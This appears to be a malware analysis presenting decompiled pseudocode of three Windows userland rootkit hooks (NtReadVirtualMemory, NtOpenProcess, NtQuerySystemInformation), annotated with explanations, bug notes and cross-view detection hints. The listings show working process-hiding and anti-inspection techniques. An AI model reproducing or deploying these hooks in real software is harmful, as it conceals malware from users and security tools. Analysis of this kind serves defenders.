Snippets from MSIL userland rootkit
/*
 * Hook installed in place of NtReadVirtualMemory (Hex-Rays decompiler output).
 *
 * The call is forwarded to the saved original entry point. When it succeeds
 * and the target is the calling process itself, the returned buffer is edited
 * in place: for each of three addresses kept in a small table, the 0x18 bytes
 * at that address are replaced with a 24-byte record from a second table, so a
 * reader of the process's own memory never sees what is currently mapped there
 * (presumably the pre-hook bytes of the patched functions — inferred from the
 * snippet's context, not provable from this listing).
 *
 * ProcessHandle        handle supplied by the caller; -1 is the current-process
 *                      pseudo-handle and is accepted without a GetProcessId lookup
 * BaseAddress          start of the range the caller asked to read
 * Buffer               caller's output buffer
 * NumberOfBytesToRead  size of the requested range
 * NumberOfBytesRead    forwarded unchanged
 *
 * Returns the NTSTATUS produced by the original routine; the filter never
 * changes it, only the buffer contents.
 *
 * The loc_* / NtReadVirtualMemory_original symbols are raw addresses inside
 * the rootkit's image; the offsets added to them are the decompiler's way of
 * rendering a fixed data location. v7..v17 (except v16) are unused artifacts.
 */
int __stdcall NtReadVirtualMemory_filter(int ProcessHandle, unsigned int BaseAddress, int Buffer, int NumberOfBytesToRead, int NumberOfBytesRead)
{
    int pid; // esi@2 — process id behind ProcessHandle
    int v7; // [sp-14h] [bp-2Ch]@1 — unused decompiler artifact
    int v8; // [sp-10h] [bp-28h]@1 — unused decompiler artifact
    int v9; // [sp-Ch] [bp-24h]@1 — unused decompiler artifact
    int v10; // [sp-8h] [bp-20h]@1 — unused decompiler artifact
    int v11; // [sp-4h] [bp-1Ch]@1 — unused decompiler artifact
    int v12; // [sp+0h] [bp-18h]@0 — unused decompiler artifact
    int v13; // [sp+4h] [bp-14h]@0 — unused decompiler artifact
    unsigned int j; // [sp+4h] [bp-14h]@9 — byte index inside the 0x18-byte patch
    int v15; // [sp+8h] [bp-10h]@0 — unused decompiler artifact
    int v16; // [sp+8h] [bp-10h]@9 — offset of the concealed address inside Buffer
    int v17; // [sp+Ch] [bp-Ch]@0 — unused decompiler artifact
    unsigned int i; // [sp+Ch] [bp-Ch]@4 — index into the 3-entry address table
    int res; // [sp+10h] [bp-8h]@1 — NTSTATUS from the original routine
    /* Forward first; the buffer is only touched when the read succeeded
       (NTSTATUS >= 0). The __cdecl in the cast disagrees with the __stdcall
       hook signature — most likely a decompiler rendering artifact. */
    res = ((int (__cdecl *)(int, unsigned int, int, int, int))((char *)&NtReadVirtualMemory_original))(
        ProcessHandle,
        BaseAddress,
        Buffer,
        NumberOfBytesToRead,
        NumberOfBytesRead);
    if ( res >= 0 )
    {
        pid = GetProcessId(ProcessHandle);
        /* Only reads of the hooked process's own memory are filtered; reads of
           other processes pass through untouched. */
        if ( pid == GetCurrentProcessId() || ProcessHandle == -1 )
        {
            /* Three DWORD entries starting at (char *)&loc_7 + 5: the addresses
               to conceal. A zero entry is an empty slot. */
            for ( i = 0; i < 3; ++i )
            {
                /* Entry is set and its START lies inside [BaseAddress, BaseAddress + NumberOfBytesToRead).
                   NOTE(review): only the start address is range-checked. An entry within the
                   last 0x17 bytes of the range still gets a full 0x18-byte write, which runs
                   past the end of the requested range inside the caller's Buffer; and
                   NumberOfBytesToRead + BaseAddress is evaluated as unsigned and can wrap. */
                if ( *(_DWORD *)((char *)&loc_7 + 4 * i + 5)
                  && *(_DWORD *)((char *)&loc_7 + 4 * i + 5) >= BaseAddress
                  && *(_DWORD *)((char *)&loc_7 + 4 * i + 5) < NumberOfBytesToRead + BaseAddress )
                {
                    /* Position of the concealed address relative to the start of the read. */
                    v16 = *(_DWORD *)((char *)&loc_7 + 4 * i + 5) - BaseAddress;
                    /* Overwrite 0x18 bytes of the returned data with the i-th 24-byte record
                       of the table at (char *)&loc_2B - 19 (records are 24 bytes apart). */
                    for ( j = 0; j < 0x18; ++j )
                        *(_BYTE *)(Buffer + v16 + j) = *((_BYTE *)&loc_2B + 24 * i + j - 19);
                }
            }
        }
    }
    return res;
}
/*
 * Hook installed in place of NtOpenProcess (Hex-Rays decompiler output).
 *
 * Open requests naming one protected process id are refused in user mode,
 * before the original routine — and therefore the kernel — is ever reached;
 * every other request is forwarded unchanged.
 *
 * ProcessHandle, DesiredAccess, ObjectAttributes  forwarded as-is
 * ClientId  CLIENT_ID pointer (may be NULL); its first DWORD (UniqueProcess)
 *           is compared against the protected id stored at
 *           (char *)&malwareId + 3 — an unaligned offset into the rootkit's
 *           data as rendered by the decompiler
 *
 * Returns 0xC0000022 (STATUS_ACCESS_DENIED) for the protected id, otherwise
 * the NTSTATUS of the original routine. NOpentProcess_original is the saved
 * original entry point (symbol name is misspelled in the listing).
 *
 * Defender note: the synthesized denial is visible only through the hooked
 * ntdll of this process; the same open performed from another process or via
 * a direct syscall succeeds, so a cross-view comparison exposes the hook.
 */
int __stdcall NtOpenProcess_filter(int ProcessHandle, int DesiredAccess, int ObjectAttributes, _DWORD *ClientId)
{
    int res; //result of the operation (NTSTATUS)
    /* Null ClientId is let through: the open is then by ObjectAttributes, not by pid. */
    if ( ClientId && *ClientId == *(_DWORD *)((char *)&malwareId + 3) )
        res = 0xC0000022; //STATUS_ACCESS_DENIED — original routine is NOT called
    else
        res = ((int (__stdcall *)(int, int, int, _DWORD *))((char *)&NOpentProcess_original))(
            ProcessHandle,
            DesiredAccess,
            ObjectAttributes,
            ClientId);
    return res;
}
/*
 * Hook installed in place of NtQuerySystemInformation (Hex-Rays decompiler
 * output).
 *
 * The query is forwarded to the original routine; on success the returned
 * buffer is edited in place so that one process id (loc_8, the protected
 * pid) disappears from two information classes:
 *   5  SystemProcessInformation — the matching entry is unlinked from the
 *      NextEntryOffset chain (the record itself stays in the buffer)
 *   16 SystemHandleInformation  — every 16-byte handle entry whose pid field
 *      matches is removed by shifting the array down one slot and
 *      decrementing the count in SystemInformation[0]
 *
 * SystemInformationClass   forwarded; only 5 and 16 are post-processed
 * SystemInformation        caller's buffer, treated as an array of DWORDs
 * SystemInformationLength  forwarded unchanged
 * ReturnLength             forwarded unchanged and never adjusted afterwards,
 *                          so for class 16 it still reflects the unfiltered
 *                          entry count (a cross-check a detector can use)
 *
 * Returns the NTSTATUS from the original routine, unchanged.
 *
 * The (_DWORD)&loc_NN - k terms are constant field offsets that the
 * decompiler rendered as address arithmetic; which structure field each one
 * selects cannot be proven from this listing alone (presumably the
 * UniqueProcessId fields of SYSTEM_PROCESS_INFORMATION and
 * SYSTEM_HANDLE_TABLE_ENTRY_INFO).
 */
int __stdcall NtQuerySystemInformation_filter(int SystemInformationClass, unsigned int *SystemInformation, int SystemInformationLength, int ReturnLength)
{
    char *v4; // esi@18 — source entry (j + 1) during the shift
    char *v5; // edi@18 — destination entry (j) during the shift
    unsigned int j; // [sp+8h] [bp-1Ch]@16 — shift index
    unsigned int i; // [sp+Ch] [bp-18h]@13 — handle-entry index
    int res; // [sp+10h] [bp-14h]@1 — NTSTATUS from the original routine
    unsigned int *sys_info_ptr; // [sp+18h] [bp-Ch]@3 — current SYSTEM_PROCESS_INFORMATION entry
    unsigned int *v11; // [sp+1Ch] [bp-8h]@5 — previous entry, whose link may be rewritten
    /* Forward first; the buffer is only edited when the query succeeded (NTSTATUS >= 0). */
    res = ((int (__stdcall *)(int, unsigned int *, int, int))NtQuerySystemInformation_original)(
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength);
    if ( res >= 0 )
    {
        if ( SystemInformationClass == 5 ) //SystemProcessInformation
        {
            sys_info_ptr = SystemInformation;
            /* Walk the chain via NextEntryOffset (first DWORD of every entry).
               The very first entry is never compared: the pid test below runs
               only after advancing to the next one. */
            while ( *sys_info_ptr )
            {
                v11 = sys_info_ptr;
                sys_info_ptr = (unsigned int *)((char *)sys_info_ptr + *sys_info_ptr);
                if ( *(unsigned int *)((char *)sys_info_ptr + (_DWORD)&loc_56 - 18) == loc_8 )
                {
                    /* Unlink: make the previous entry skip this one, or terminate
                       the chain if this was the last entry. Then resume from the
                       previous entry so its new successor is examined as well. */
                    if ( *sys_info_ptr )
                        *v11 += *sys_info_ptr;
                    else
                        *v11 = 0;
                    sys_info_ptr = v11;
                }
            }
        }
        else if ( SystemInformationClass == 16 ) //SystemHandleInformation
        {
            /* SystemInformation[0] is the entry count; entries are 16 bytes
               (4 DWORDs), hence the [4 * i] indexing. */
            for ( i = 0; i < *SystemInformation; ++i )
            {
                if ( *(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) == loc_8 )
                {
                    /* Zero the matched entry's fields. Redundant for this slot,
                       since the shift below overwrites it with entry i + 1. */
                    *((_BYTE *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 20) = 0;
                    *(_DWORD *)((char *)&loc_23 + (_DWORD)&SystemInformation[4 * i] - 19) = 0;
                    *(_WORD *)((char *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 19) = 0;
                    *(_DWORD *)((char *)&loc_20 + (_DWORD)&SystemInformation[4 * i] - 20) = 0;
                    *((_BYTE *)&loc_1A + (_DWORD)&SystemInformation[4 * i] - 18) = 0;
                    *(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) = 0;
                    /* Shift every following entry down one slot (4 DWORD copies per entry).
                       NOTE(review): for j == count - 1 the source is the slot at index
                       count, one past the last counted entry — a read beyond the
                       reported array, whatever happens to be there in the buffer. */
                    for ( j = i; j < *SystemInformation; ++j )
                    {
                        v4 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * (j + 1)] - 17;
                        v5 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * j] - 17;
                        *(_DWORD *)v5 = *(_DWORD *)v4;
                        v4 += 4;
                        v5 += 4;
                        *(_DWORD *)v5 = *(_DWORD *)v4;
                        v4 += 4;
                        v5 += 4;
                        *(_DWORD *)v5 = *(_DWORD *)v4;
                        *((_DWORD *)v5 + 1) = *((_DWORD *)v4 + 1);
                    }
                    --*SystemInformation; // one fewer entry reported to the caller
                    --i; // re-examine slot i, which now holds the former entry i + 1
                         // (unsigned wrap at i == 0 is well defined; ++i restores 0)
                }
            }
        }
    }
    return res;
}